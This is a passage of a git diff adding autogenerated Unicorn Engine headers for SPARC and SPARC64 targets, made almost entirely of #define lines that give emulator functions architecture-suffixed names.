tcg_gen_st_i64_sparc +#define tcg_gen_sub_i32 tcg_gen_sub_i32_sparc +#define tcg_gen_sub_i64 tcg_gen_sub_i64_sparc +#define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_sparc +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_sparc +#define tcg_gen_xor_i32 tcg_gen_xor_i32_sparc +#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc +#define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_sparc +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_sparc +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_sparc +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_sparc +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_sparc +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_sparc +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_sparc +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_sparc +#define tcg_handle_interrupt tcg_handle_interrupt_sparc +#define tcg_init tcg_init_sparc +#define tcg_invert_cond tcg_invert_cond_sparc +#define tcg_la_bb_end tcg_la_bb_end_sparc +#define tcg_la_br_end tcg_la_br_end_sparc +#define tcg_la_func_end tcg_la_func_end_sparc +#define tcg_liveness_analysis tcg_liveness_analysis_sparc +#define tcg_malloc tcg_malloc_sparc +#define tcg_malloc_internal tcg_malloc_internal_sparc +#define tcg_op_defs_org tcg_op_defs_org_sparc +#define tcg_opt_gen_mov tcg_opt_gen_mov_sparc +#define tcg_opt_gen_movi tcg_opt_gen_movi_sparc +#define tcg_optimize tcg_optimize_sparc +#define tcg_out16 tcg_out16_sparc +#define tcg_out32 tcg_out32_sparc +#define tcg_out64 tcg_out64_sparc +#define tcg_out8 tcg_out8_sparc +#define tcg_out_addi tcg_out_addi_sparc +#define tcg_out_branch tcg_out_branch_sparc +#define tcg_out_brcond32 tcg_out_brcond32_sparc +#define tcg_out_brcond64 tcg_out_brcond64_sparc +#define tcg_out_bswap32 tcg_out_bswap32_sparc +#define tcg_out_bswap64 
tcg_out_bswap64_sparc +#define tcg_out_call tcg_out_call_sparc +#define tcg_out_cmp tcg_out_cmp_sparc +#define tcg_out_ext16s tcg_out_ext16s_sparc +#define tcg_out_ext16u tcg_out_ext16u_sparc +#define tcg_out_ext32s tcg_out_ext32s_sparc +#define tcg_out_ext32u tcg_out_ext32u_sparc +#define tcg_out_ext8s tcg_out_ext8s_sparc +#define tcg_out_ext8u tcg_out_ext8u_sparc +#define tcg_out_jmp tcg_out_jmp_sparc +#define tcg_out_jxx tcg_out_jxx_sparc +#define tcg_out_label tcg_out_label_sparc +#define tcg_out_ld tcg_out_ld_sparc +#define tcg_out_modrm tcg_out_modrm_sparc +#define tcg_out_modrm_offset tcg_out_modrm_offset_sparc +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_sparc +#define tcg_out_mov tcg_out_mov_sparc +#define tcg_out_movcond32 tcg_out_movcond32_sparc +#define tcg_out_movcond64 tcg_out_movcond64_sparc +#define tcg_out_movi tcg_out_movi_sparc +#define tcg_out_op tcg_out_op_sparc +#define tcg_out_pop tcg_out_pop_sparc +#define tcg_out_push tcg_out_push_sparc +#define tcg_out_qemu_ld tcg_out_qemu_ld_sparc +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_sparc +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_sparc +#define tcg_out_qemu_st tcg_out_qemu_st_sparc +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_sparc +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_sparc +#define tcg_out_reloc tcg_out_reloc_sparc +#define tcg_out_rolw_8 tcg_out_rolw_8_sparc +#define tcg_out_setcond32 tcg_out_setcond32_sparc +#define tcg_out_setcond64 tcg_out_setcond64_sparc +#define tcg_out_shifti tcg_out_shifti_sparc +#define tcg_out_st tcg_out_st_sparc +#define tcg_out_tb_finalize tcg_out_tb_finalize_sparc +#define tcg_out_tb_init tcg_out_tb_init_sparc +#define tcg_out_tlb_load tcg_out_tlb_load_sparc +#define tcg_out_vex_modrm tcg_out_vex_modrm_sparc +#define tcg_patch32 tcg_patch32_sparc +#define tcg_patch8 tcg_patch8_sparc +#define tcg_pcrel_diff tcg_pcrel_diff_sparc +#define tcg_pool_reset tcg_pool_reset_sparc +#define 
tcg_prologue_init tcg_prologue_init_sparc +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_sparc +#define tcg_reg_alloc tcg_reg_alloc_sparc +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_sparc +#define tcg_reg_alloc_call tcg_reg_alloc_call_sparc +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_sparc +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_sparc +#define tcg_reg_alloc_op tcg_reg_alloc_op_sparc +#define tcg_reg_alloc_start tcg_reg_alloc_start_sparc +#define tcg_reg_free tcg_reg_free_sparc +#define tcg_reg_sync tcg_reg_sync_sparc +#define tcg_set_frame tcg_set_frame_sparc +#define tcg_set_nop tcg_set_nop_sparc +#define tcg_swap_cond tcg_swap_cond_sparc +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_sparc +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_sparc +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_sparc +#define tcg_target_const_match tcg_target_const_match_sparc +#define tcg_target_init tcg_target_init_sparc +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_sparc +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_sparc +#define tcg_temp_alloc tcg_temp_alloc_sparc +#define tcg_temp_free_i32 tcg_temp_free_i32_sparc +#define tcg_temp_free_i64 tcg_temp_free_i64_sparc +#define tcg_temp_free_internal tcg_temp_free_internal_sparc +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_sparc +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_sparc +#define tcg_temp_new_i32 tcg_temp_new_i32_sparc +#define tcg_temp_new_i64 tcg_temp_new_i64_sparc +#define tcg_temp_new_internal tcg_temp_new_internal_sparc +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_sparc +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_sparc +#define tdb_hash tdb_hash_sparc +#define teecr_write teecr_write_sparc +#define teehbr_access teehbr_access_sparc +#define temp_allocate_frame temp_allocate_frame_sparc +#define temp_dead temp_dead_sparc +#define temps_are_copies temps_are_copies_sparc +#define 
temp_save temp_save_sparc +#define temp_sync temp_sync_sparc +#define tgen_arithi tgen_arithi_sparc +#define tgen_arithr tgen_arithr_sparc +#define thumb2_logic_op thumb2_logic_op_sparc +#define ti925t_initfn ti925t_initfn_sparc +#define tlb_add_large_page tlb_add_large_page_sparc +#define tlb_flush_entry tlb_flush_entry_sparc +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_sparc +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_sparc +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_sparc +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_sparc +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_sparc +#define tlbi_aa64_va_write tlbi_aa64_va_write_sparc +#define tlbiall_is_write tlbiall_is_write_sparc +#define tlbiall_write tlbiall_write_sparc +#define tlbiasid_is_write tlbiasid_is_write_sparc +#define tlbiasid_write tlbiasid_write_sparc +#define tlbimvaa_is_write tlbimvaa_is_write_sparc +#define tlbimvaa_write tlbimvaa_write_sparc +#define tlbimva_is_write tlbimva_is_write_sparc +#define tlbimva_write tlbimva_write_sparc +#define tlb_is_dirty_ram tlb_is_dirty_ram_sparc +#define tlb_protect_code tlb_protect_code_sparc +#define tlb_reset_dirty_range tlb_reset_dirty_range_sparc +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_sparc +#define tlb_set_dirty tlb_set_dirty_sparc +#define tlb_set_dirty1 tlb_set_dirty1_sparc +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_sparc +#define tlb_vaddr_to_host tlb_vaddr_to_host_sparc +#define token_get_type token_get_type_sparc +#define token_get_value token_get_value_sparc +#define token_is_escape token_is_escape_sparc +#define token_is_keyword token_is_keyword_sparc +#define token_is_operator token_is_operator_sparc +#define tokens_append_from_iter tokens_append_from_iter_sparc +#define to_qiv to_qiv_sparc +#define to_qov to_qov_sparc +#define tosa_init tosa_init_sparc +#define tosa_machine_init tosa_machine_init_sparc +#define tswap32 tswap32_sparc +#define tswap64 tswap64_sparc +#define 
type_class_get_size type_class_get_size_sparc +#define type_get_by_name type_get_by_name_sparc +#define type_get_parent type_get_parent_sparc +#define type_has_parent type_has_parent_sparc +#define type_initialize type_initialize_sparc +#define type_initialize_interface type_initialize_interface_sparc +#define type_is_ancestor type_is_ancestor_sparc +#define type_new type_new_sparc +#define type_object_get_size type_object_get_size_sparc +#define type_register_internal type_register_internal_sparc +#define type_table_add type_table_add_sparc +#define type_table_get type_table_get_sparc +#define type_table_lookup type_table_lookup_sparc +#define uint16_to_float32 uint16_to_float32_sparc +#define uint16_to_float64 uint16_to_float64_sparc +#define uint32_to_float32 uint32_to_float32_sparc +#define uint32_to_float64 uint32_to_float64_sparc +#define uint64_to_float128 uint64_to_float128_sparc +#define uint64_to_float32 uint64_to_float32_sparc +#define uint64_to_float64 uint64_to_float64_sparc +#define unassigned_io_ops unassigned_io_ops_sparc +#define unassigned_io_read unassigned_io_read_sparc +#define unassigned_io_write unassigned_io_write_sparc +#define unassigned_mem_accepts unassigned_mem_accepts_sparc +#define unassigned_mem_ops unassigned_mem_ops_sparc +#define unassigned_mem_read unassigned_mem_read_sparc +#define unassigned_mem_write unassigned_mem_write_sparc +#define update_spsel update_spsel_sparc +#define v6_cp_reginfo v6_cp_reginfo_sparc +#define v6k_cp_reginfo v6k_cp_reginfo_sparc +#define v7_cp_reginfo v7_cp_reginfo_sparc +#define v7mp_cp_reginfo v7mp_cp_reginfo_sparc +#define v7m_pop v7m_pop_sparc +#define v7m_push v7m_push_sparc +#define v8_cp_reginfo v8_cp_reginfo_sparc +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_sparc +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_sparc +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_sparc +#define vapa_cp_reginfo vapa_cp_reginfo_sparc +#define vbar_write vbar_write_sparc +#define vfp_exceptbits_from_host 
vfp_exceptbits_from_host_sparc +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_sparc +#define vfp_get_fpcr vfp_get_fpcr_sparc +#define vfp_get_fpscr vfp_get_fpscr_sparc +#define vfp_get_fpsr vfp_get_fpsr_sparc +#define vfp_reg_offset vfp_reg_offset_sparc +#define vfp_set_fpcr vfp_set_fpcr_sparc +#define vfp_set_fpscr vfp_set_fpscr_sparc +#define vfp_set_fpsr vfp_set_fpsr_sparc +#define visit_end_implicit_struct visit_end_implicit_struct_sparc +#define visit_end_list visit_end_list_sparc +#define visit_end_struct visit_end_struct_sparc +#define visit_end_union visit_end_union_sparc +#define visit_get_next_type visit_get_next_type_sparc +#define visit_next_list visit_next_list_sparc +#define visit_optional visit_optional_sparc +#define visit_start_implicit_struct visit_start_implicit_struct_sparc +#define visit_start_list visit_start_list_sparc +#define visit_start_struct visit_start_struct_sparc +#define visit_start_union visit_start_union_sparc +#define vmsa_cp_reginfo vmsa_cp_reginfo_sparc +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_sparc +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_sparc +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_sparc +#define vmsa_ttbcr_write vmsa_ttbcr_write_sparc +#define vmsa_ttbr_write vmsa_ttbr_write_sparc +#define write_cpustate_to_list write_cpustate_to_list_sparc +#define write_list_to_cpustate write_list_to_cpustate_sparc +#define write_raw_cp_reg write_raw_cp_reg_sparc +#define X86CPURegister32_lookup X86CPURegister32_lookup_sparc +#define x86_op_defs x86_op_defs_sparc +#define xpsr_read xpsr_read_sparc +#define xpsr_write xpsr_write_sparc +#define xscale_cpar_write xscale_cpar_write_sparc +#define xscale_cp_reginfo xscale_cp_reginfo_sparc +#define cpu_sparc_exec cpu_sparc_exec_sparc +#define helper_compute_psr helper_compute_psr_sparc +#define helper_compute_C_icc helper_compute_C_icc_sparc +#define cpu_sparc_init cpu_sparc_init_sparc +#define cpu_sparc_set_id cpu_sparc_set_id_sparc +#define sparc_cpu_register_types 
sparc_cpu_register_types_sparc +#define helper_fadds helper_fadds_sparc +#define helper_faddd helper_faddd_sparc +#define helper_faddq helper_faddq_sparc +#define helper_fsubs helper_fsubs_sparc +#define helper_fsubd helper_fsubd_sparc +#define helper_fsubq helper_fsubq_sparc +#define helper_fmuls helper_fmuls_sparc +#define helper_fmuld helper_fmuld_sparc +#define helper_fmulq helper_fmulq_sparc +#define helper_fdivs helper_fdivs_sparc +#define helper_fdivd helper_fdivd_sparc +#define helper_fdivq helper_fdivq_sparc +#define helper_fsmuld helper_fsmuld_sparc +#define helper_fdmulq helper_fdmulq_sparc +#define helper_fnegs helper_fnegs_sparc +#define helper_fitos helper_fitos_sparc +#define helper_fitod helper_fitod_sparc +#define helper_fitoq helper_fitoq_sparc +#define helper_fdtos helper_fdtos_sparc +#define helper_fstod helper_fstod_sparc +#define helper_fqtos helper_fqtos_sparc +#define helper_fstoq helper_fstoq_sparc +#define helper_fqtod helper_fqtod_sparc +#define helper_fdtoq helper_fdtoq_sparc +#define helper_fstoi helper_fstoi_sparc +#define helper_fdtoi helper_fdtoi_sparc +#define helper_fqtoi helper_fqtoi_sparc +#define helper_fabss helper_fabss_sparc +#define helper_fsqrts helper_fsqrts_sparc +#define helper_fsqrtd helper_fsqrtd_sparc +#define helper_fsqrtq helper_fsqrtq_sparc +#define helper_fcmps helper_fcmps_sparc +#define helper_fcmpd helper_fcmpd_sparc +#define helper_fcmpes helper_fcmpes_sparc +#define helper_fcmped helper_fcmped_sparc +#define helper_fcmpq helper_fcmpq_sparc +#define helper_fcmpeq helper_fcmpeq_sparc +#define helper_ldfsr helper_ldfsr_sparc +#define helper_debug helper_debug_sparc +#define helper_udiv_cc helper_udiv_cc_sparc +#define helper_sdiv_cc helper_sdiv_cc_sparc +#define helper_taddcctv helper_taddcctv_sparc +#define helper_tsubcctv helper_tsubcctv_sparc +#define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc +#define helper_check_align helper_check_align_sparc +#define helper_ld_asi helper_ld_asi_sparc +#define 
helper_st_asi helper_st_asi_sparc +#define helper_cas_asi helper_cas_asi_sparc +#define helper_ldqf helper_ldqf_sparc +#define helper_stqf helper_stqf_sparc +#define sparc_cpu_unassigned_access sparc_cpu_unassigned_access_sparc +#define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc +#define sparc_cpu_handle_mmu_fault sparc_cpu_handle_mmu_fault_sparc +#define dump_mmu dump_mmu_sparc +#define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc +#define sparc_reg_reset sparc_reg_reset_sparc +#define sparc_reg_read sparc_reg_read_sparc +#define sparc_reg_write sparc_reg_write_sparc +#define gen_intermediate_code_init gen_intermediate_code_init_sparc +#define cpu_set_cwp cpu_set_cwp_sparc +#define cpu_get_psr cpu_get_psr_sparc +#define cpu_put_psr cpu_put_psr_sparc +#define cpu_cwp_inc cpu_cwp_inc_sparc +#define cpu_cwp_dec cpu_cwp_dec_sparc +#define helper_save helper_save_sparc +#define helper_restore helper_restore_sparc +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h new file mode 100644 index 0000000..f389522 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc64.h @@ -0,0 +1,3092 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_SPARC64_H +#define UNICORN_AUTOGEN_SPARC64_H +#define arm_release arm_release_sparc64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_sparc64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_sparc64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_sparc64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_sparc64 +#define helper_power_down helper_power_down_sparc64 +#define check_exit_request check_exit_request_sparc64 +#define address_space_unregister address_space_unregister_sparc64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc64 +#define phys_mem_clean phys_mem_clean_sparc64 +#define tb_cleanup 
tb_cleanup_sparc64 +#define memory_map memory_map_sparc64 +#define memory_map_ptr memory_map_ptr_sparc64 +#define memory_unmap memory_unmap_sparc64 +#define memory_free memory_free_sparc64 +#define free_code_gen_buffer free_code_gen_buffer_sparc64 +#define helper_raise_exception helper_raise_exception_sparc64 +#define tcg_enabled tcg_enabled_sparc64 +#define tcg_exec_init tcg_exec_init_sparc64 +#define memory_register_types memory_register_types_sparc64 +#define cpu_exec_init_all cpu_exec_init_all_sparc64 +#define vm_start vm_start_sparc64 +#define resume_all_vcpus resume_all_vcpus_sparc64 +#define a15_l2ctlr_read a15_l2ctlr_read_sparc64 +#define a64_translate_init a64_translate_init_sparc64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_sparc64 +#define aa64_cacheop_access aa64_cacheop_access_sparc64 +#define aa64_daif_access aa64_daif_access_sparc64 +#define aa64_daif_write aa64_daif_write_sparc64 +#define aa64_dczid_read aa64_dczid_read_sparc64 +#define aa64_fpcr_read aa64_fpcr_read_sparc64 +#define aa64_fpcr_write aa64_fpcr_write_sparc64 +#define aa64_fpsr_read aa64_fpsr_read_sparc64 +#define aa64_fpsr_write aa64_fpsr_write_sparc64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_sparc64 +#define aa64_zva_access aa64_zva_access_sparc64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_sparc64 +#define aarch64_restore_sp aarch64_restore_sp_sparc64 +#define aarch64_save_sp aarch64_save_sp_sparc64 +#define accel_find accel_find_sparc64 +#define accel_init_machine accel_init_machine_sparc64 +#define accel_type accel_type_sparc64 +#define access_with_adjusted_size access_with_adjusted_size_sparc64 +#define add128 add128_sparc64 +#define add16_sat add16_sat_sparc64 +#define add16_usat add16_usat_sparc64 +#define add192 add192_sparc64 +#define add8_sat add8_sat_sparc64 +#define add8_usat add8_usat_sparc64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_sparc64 +#define add_cpreg_to_list 
add_cpreg_to_list_sparc64 +#define addFloat128Sigs addFloat128Sigs_sparc64 +#define addFloat32Sigs addFloat32Sigs_sparc64 +#define addFloat64Sigs addFloat64Sigs_sparc64 +#define addFloatx80Sigs addFloatx80Sigs_sparc64 +#define add_qemu_ldst_label add_qemu_ldst_label_sparc64 +#define address_space_access_valid address_space_access_valid_sparc64 +#define address_space_destroy address_space_destroy_sparc64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_sparc64 +#define address_space_get_flatview address_space_get_flatview_sparc64 +#define address_space_init address_space_init_sparc64 +#define address_space_init_dispatch address_space_init_dispatch_sparc64 +#define address_space_lookup_region address_space_lookup_region_sparc64 +#define address_space_map address_space_map_sparc64 +#define address_space_read address_space_read_sparc64 +#define address_space_rw address_space_rw_sparc64 +#define address_space_translate address_space_translate_sparc64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc64 +#define address_space_translate_internal address_space_translate_internal_sparc64 +#define address_space_unmap address_space_unmap_sparc64 +#define address_space_update_topology address_space_update_topology_sparc64 +#define address_space_update_topology_pass address_space_update_topology_pass_sparc64 +#define address_space_write address_space_write_sparc64 +#define addrrange_contains addrrange_contains_sparc64 +#define addrrange_end addrrange_end_sparc64 +#define addrrange_equal addrrange_equal_sparc64 +#define addrrange_intersection addrrange_intersection_sparc64 +#define addrrange_intersects addrrange_intersects_sparc64 +#define addrrange_make addrrange_make_sparc64 +#define adjust_endianness adjust_endianness_sparc64 +#define all_helpers all_helpers_sparc64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_sparc64 +#define alloc_entry alloc_entry_sparc64 +#define always_true always_true_sparc64 +#define 
arm1026_initfn arm1026_initfn_sparc64 +#define arm1136_initfn arm1136_initfn_sparc64 +#define arm1136_r2_initfn arm1136_r2_initfn_sparc64 +#define arm1176_initfn arm1176_initfn_sparc64 +#define arm11mpcore_initfn arm11mpcore_initfn_sparc64 +#define arm926_initfn arm926_initfn_sparc64 +#define arm946_initfn arm946_initfn_sparc64 +#define arm_ccnt_enabled arm_ccnt_enabled_sparc64 +#define arm_cp_read_zero arm_cp_read_zero_sparc64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_sparc64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_sparc64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_sparc64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_sparc64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_sparc64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_sparc64 +#define arm_cpu_initfn arm_cpu_initfn_sparc64 +#define arm_cpu_list arm_cpu_list_sparc64 +#define cpu_loop_exit cpu_loop_exit_sparc64 +#define arm_cpu_post_init arm_cpu_post_init_sparc64 +#define arm_cpu_realizefn arm_cpu_realizefn_sparc64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_sparc64 +#define arm_cpu_register_types arm_cpu_register_types_sparc64 +#define cpu_resume_from_signal cpu_resume_from_signal_sparc64 +#define arm_cpus arm_cpus_sparc64 +#define arm_cpu_set_pc arm_cpu_set_pc_sparc64 +#define arm_cp_write_ignore arm_cp_write_ignore_sparc64 +#define arm_current_el arm_current_el_sparc64 +#define arm_dc_feature arm_dc_feature_sparc64 +#define arm_debug_excp_handler arm_debug_excp_handler_sparc64 +#define arm_debug_target_el arm_debug_target_el_sparc64 +#define arm_el_is_aa64 arm_el_is_aa64_sparc64 +#define arm_env_get_cpu arm_env_get_cpu_sparc64 +#define arm_excp_target_el arm_excp_target_el_sparc64 +#define arm_excp_unmasked arm_excp_unmasked_sparc64 +#define arm_feature arm_feature_sparc64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_sparc64 +#define gen_intermediate_code 
gen_intermediate_code_sparc64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_sparc64 +#define arm_gen_test_cc arm_gen_test_cc_sparc64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_sparc64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_sparc64 +#define arm_handle_psci_call arm_handle_psci_call_sparc64 +#define arm_is_psci_call arm_is_psci_call_sparc64 +#define arm_is_secure arm_is_secure_sparc64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_sparc64 +#define arm_ldl_code arm_ldl_code_sparc64 +#define arm_lduw_code arm_lduw_code_sparc64 +#define arm_log_exception arm_log_exception_sparc64 +#define arm_reg_read arm_reg_read_sparc64 +#define arm_reg_reset arm_reg_reset_sparc64 +#define arm_reg_write arm_reg_write_sparc64 +#define restore_state_to_opc restore_state_to_opc_sparc64 +#define arm_rmode_to_sf arm_rmode_to_sf_sparc64 +#define arm_singlestep_active arm_singlestep_active_sparc64 +#define tlb_fill tlb_fill_sparc64 +#define tlb_flush tlb_flush_sparc64 +#define tlb_flush_page tlb_flush_page_sparc64 +#define tlb_set_page tlb_set_page_sparc64 +#define arm_translate_init arm_translate_init_sparc64 +#define arm_v7m_class_init arm_v7m_class_init_sparc64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_sparc64 +#define ats_access ats_access_sparc64 +#define ats_write ats_write_sparc64 +#define bad_mode_switch bad_mode_switch_sparc64 +#define bank_number bank_number_sparc64 +#define bitmap_zero_extend bitmap_zero_extend_sparc64 +#define bp_wp_matches bp_wp_matches_sparc64 +#define breakpoint_invalidate breakpoint_invalidate_sparc64 +#define build_page_bitmap build_page_bitmap_sparc64 +#define bus_add_child bus_add_child_sparc64 +#define bus_class_init bus_class_init_sparc64 +#define bus_info bus_info_sparc64 +#define bus_unparent bus_unparent_sparc64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_sparc64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_sparc64 +#define cache_test_clean_cp_reginfo 
cache_test_clean_cp_reginfo_sparc64 +#define call_recip_estimate call_recip_estimate_sparc64 +#define can_merge can_merge_sparc64 +#define capacity_increase capacity_increase_sparc64 +#define ccsidr_read ccsidr_read_sparc64 +#define check_ap check_ap_sparc64 +#define check_breakpoints check_breakpoints_sparc64 +#define check_watchpoints check_watchpoints_sparc64 +#define cho cho_sparc64 +#define clear_bit clear_bit_sparc64 +#define clz32 clz32_sparc64 +#define clz64 clz64_sparc64 +#define cmp_flatrange_addr cmp_flatrange_addr_sparc64 +#define code_gen_alloc code_gen_alloc_sparc64 +#define commonNaNToFloat128 commonNaNToFloat128_sparc64 +#define commonNaNToFloat16 commonNaNToFloat16_sparc64 +#define commonNaNToFloat32 commonNaNToFloat32_sparc64 +#define commonNaNToFloat64 commonNaNToFloat64_sparc64 +#define commonNaNToFloatx80 commonNaNToFloatx80_sparc64 +#define compute_abs_deadline compute_abs_deadline_sparc64 +#define cond_name cond_name_sparc64 +#define configure_accelerator configure_accelerator_sparc64 +#define container_get container_get_sparc64 +#define container_info container_info_sparc64 +#define container_register_types container_register_types_sparc64 +#define contextidr_write contextidr_write_sparc64 +#define core_log_global_start core_log_global_start_sparc64 +#define core_log_global_stop core_log_global_stop_sparc64 +#define core_memory_listener core_memory_listener_sparc64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_sparc64 +#define cortex_a15_initfn cortex_a15_initfn_sparc64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_sparc64 +#define cortex_a8_initfn cortex_a8_initfn_sparc64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_sparc64 +#define cortex_a9_initfn cortex_a9_initfn_sparc64 +#define cortex_m3_initfn cortex_m3_initfn_sparc64 +#define count_cpreg count_cpreg_sparc64 +#define countLeadingZeros32 countLeadingZeros32_sparc64 +#define countLeadingZeros64 countLeadingZeros64_sparc64 +#define cp_access_ok cp_access_ok_sparc64 +#define 
cpacr_write cpacr_write_sparc64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_sparc64 +#define cp_reginfo cp_reginfo_sparc64 +#define cpreg_key_compare cpreg_key_compare_sparc64 +#define cpreg_make_keylist cpreg_make_keylist_sparc64 +#define cp_reg_reset cp_reg_reset_sparc64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_sparc64 +#define cpsr_read cpsr_read_sparc64 +#define cpsr_write cpsr_write_sparc64 +#define cptype_valid cptype_valid_sparc64 +#define cpu_abort cpu_abort_sparc64 +#define cpu_arm_exec cpu_arm_exec_sparc64 +#define cpu_arm_gen_code cpu_arm_gen_code_sparc64 +#define cpu_arm_init cpu_arm_init_sparc64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_sparc64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_sparc64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc64 +#define cpu_can_do_io cpu_can_do_io_sparc64 +#define cpu_can_run cpu_can_run_sparc64 +#define cpu_class_init cpu_class_init_sparc64 +#define cpu_common_class_by_name cpu_common_class_by_name_sparc64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_sparc64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_sparc64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_sparc64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_sparc64 +#define cpu_common_has_work cpu_common_has_work_sparc64 +#define cpu_common_initfn cpu_common_initfn_sparc64 +#define cpu_common_noop cpu_common_noop_sparc64 +#define cpu_common_parse_features cpu_common_parse_features_sparc64 +#define cpu_common_realizefn cpu_common_realizefn_sparc64 +#define cpu_common_reset cpu_common_reset_sparc64 +#define cpu_dump_statistics cpu_dump_statistics_sparc64 +#define cpu_exec_init cpu_exec_init_sparc64 +#define cpu_flush_icache_range cpu_flush_icache_range_sparc64 +#define cpu_gen_init cpu_gen_init_sparc64 +#define cpu_get_clock cpu_get_clock_sparc64 +#define cpu_get_real_ticks 
